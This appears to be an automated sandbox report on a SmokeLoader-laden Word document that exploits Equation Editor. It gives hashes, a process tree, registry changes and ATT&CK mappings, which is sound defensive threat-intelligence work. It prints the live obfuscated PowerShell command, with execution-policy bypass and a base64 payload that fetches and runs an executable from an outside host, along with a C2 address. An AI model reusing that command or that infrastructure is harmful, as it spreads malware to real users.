smokeloader | 6b2e23e38be7ad27c11af03599f5caaf69dff237e39a5ffb1904db398e613221

General

Target

2021lk049443.doc
Size

1.1MB
MD5

67cb98b84a7db5f2f69023b0c5c08309
SHA1

9f04a27bb59ac6842ea400c95af131612bfe00f9
SHA256

6b2e23e38be7ad27c11af03599f5caaf69dff237e39a5ffb1904db398e613221
SHA512

fd6ad0a85ae2cd37e278c5cf702e67508b606108fd2c5854d52e37574088204db47d015251cde5dd75fe60b155440ed0aa8a735fd9b0fc5d423bda58458fb512

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/28oLW.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.115.43/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 4 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

flow pid process

7 1692 EQNEDT32.EXE
9 1692 EQNEDT32.EXE
11 1692 EQNEDT32.EXE
12 596 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

69577.exeeVDwACBtpW.exe

pid process

316 69577.exe
1448 eVDwACBtpW.exe
Loads dropped DLL 3 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

pid process

1692 EQNEDT32.EXE
596 powershell.exe
596 powershell.exe

flow	pid	process
7	1692	EQNEDT32.EXE
9	1692	EQNEDT32.EXE
11	1692	EQNEDT32.EXE
12	596	powershell.exe

pid	process
316	69577.exe
1448	eVDwACBtpW.exe

pid	process
1692	EQNEDT32.EXE
596	powershell.exe
596	powershell.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

eVDwACBtpW.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	eVDwACBtpW.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	eVDwACBtpW.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1692 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
1692	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1088 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

852 powershell.exe
852 powershell.exe
596 powershell.exe
596 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

eVDwACBtpW.exe

pid process

1448 eVDwACBtpW.exe
1448 eVDwACBtpW.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 852 powershell.exe
Token: SeDebugPrivilege 596 powershell.exe
Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

69577.exe

pid process

316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
Suspicious use of SendNotifyMessage 10 IoCs

Processes:

69577.exe

pid process

316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
316 69577.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1088 WINWORD.EXE
1088 WINWORD.EXE

pid	process
1088	WINWORD.EXE

pid	process
852	powershell.exe
852	powershell.exe
596	powershell.exe
596	powershell.exe

pid	process
1448	eVDwACBtpW.exe
1448	eVDwACBtpW.exe

description	pid	process
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	596	powershell.exe

pid	process
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe

pid	process
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe
316	69577.exe

pid	process
1088	WINWORD.EXE
1088	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WINWORD.EXEEQNEDT32.EXE69577.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1088 wrote to memory of 1348	1088	WINWORD.EXE	splwow64.exe
PID 1088 wrote to memory of 1348	1088	WINWORD.EXE	splwow64.exe
PID 1088 wrote to memory of 1348	1088	WINWORD.EXE	splwow64.exe
PID 1088 wrote to memory of 1348	1088	WINWORD.EXE	splwow64.exe
PID 1692 wrote to memory of 316	1692	EQNEDT32.EXE	69577.exe
PID 1692 wrote to memory of 316	1692	EQNEDT32.EXE	69577.exe
PID 1692 wrote to memory of 316	1692	EQNEDT32.EXE	69577.exe
PID 1692 wrote to memory of 316	1692	EQNEDT32.EXE	69577.exe
PID 316 wrote to memory of 852	316	69577.exe	powershell.exe
PID 316 wrote to memory of 852	316	69577.exe	powershell.exe
PID 316 wrote to memory of 852	316	69577.exe	powershell.exe
PID 316 wrote to memory of 852	316	69577.exe	powershell.exe
PID 852 wrote to memory of 596	852	powershell.exe	powershell.exe
PID 852 wrote to memory of 596	852	powershell.exe	powershell.exe
PID 852 wrote to memory of 596	852	powershell.exe	powershell.exe
PID 852 wrote to memory of 596	852	powershell.exe	powershell.exe
PID 596 wrote to memory of 1448	596	powershell.exe	eVDwACBtpW.exe
PID 596 wrote to memory of 1448	596	powershell.exe	eVDwACBtpW.exe
PID 596 wrote to memory of 1448	596	powershell.exe	eVDwACBtpW.exe
PID 596 wrote to memory of 1448	596	powershell.exe	eVDwACBtpW.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049443.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1348

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1692

C:\Users\Public\69577.exe
"C:\Users\Public\69577.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:596

C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"
5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:1448

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
70c37acc616cbd0d83e7ebfe0b8bc554

SHA1
34dc0101703083588ba0803cb1d6c62c43c1cc42

SHA256
779d30a8664c519ac47911fb2830e0ae82bbcd936ff1da51c78fefc222df7f22

SHA512
1a70beb062ab0d284b2bd870bcb37690d8d25c50f39cf6820983370887314c29d57472eb4bd7ce64e975e1ac2d88253bf435eb6c6e8738d48b0bdb510722e125

Download Submit
C:\Users\Public\69577.exe
MD5
9fbd32c6bb25f6a660696fa9830c5040

SHA1
1e41347d36792e823a8982b10170d83a0722e3cc

SHA256
5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14

SHA512
3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb

Download Submit
C:\Users\Public\69577.exe
MD5
9fbd32c6bb25f6a660696fa9830c5040

SHA1
1e41347d36792e823a8982b10170d83a0722e3cc

SHA256
5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14

SHA512
3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb

Download Submit
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
\Users\Public\69577.exe
MD5
9fbd32c6bb25f6a660696fa9830c5040

SHA1
1e41347d36792e823a8982b10170d83a0722e3cc

SHA256
5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14

SHA512
3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb

Download Submit
memory/316-66-0x0000000000000000-mapping.dmp

Download
memory/596-102-0x0000000006340000-0x0000000006341000-memory.dmp

Filesize
4KB

Download
memory/596-78-0x0000000000000000-mapping.dmp

Download
memory/596-104-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/596-103-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/596-95-0x0000000006370000-0x0000000006371000-memory.dmp

Filesize
4KB

Download
memory/596-94-0x0000000005830000-0x0000000005831000-memory.dmp

Filesize
4KB

Download
memory/596-89-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/596-84-0x0000000004A60000-0x0000000004A61000-memory.dmp

Filesize
4KB

Download
memory/596-85-0x0000000004A62000-0x0000000004A63000-memory.dmp

Filesize
4KB

Download
memory/852-76-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/852-70-0x0000000000000000-mapping.dmp

Download
memory/852-77-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/852-72-0x00000000004D0000-0x00000000004D1000-memory.dmp

Filesize
4KB

Download
memory/852-75-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/852-74-0x0000000004962000-0x0000000004963000-memory.dmp

Filesize
4KB

Download
memory/852-73-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/1088-59-0x00000000726F1000-0x00000000726F4000-memory.dmp

Filesize
12KB

Download
memory/1088-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1088-60-0x0000000070171000-0x0000000070173000-memory.dmp

Filesize
8KB

Download
memory/1088-112-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1264-110-0x0000000002CB0000-0x0000000002CB1000-memory.dmp

Filesize
4KB

Download
memory/1264-111-0x0000000002C90000-0x0000000002CA5000-memory.dmp

Filesize
84KB

Download
memory/1348-63-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

Filesize
8KB

Download
memory/1348-62-0x0000000000000000-mapping.dmp

Download
memory/1448-107-0x0000000000000000-mapping.dmp

Download
memory/1692-64-0x00000000753B1000-0x00000000753B3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads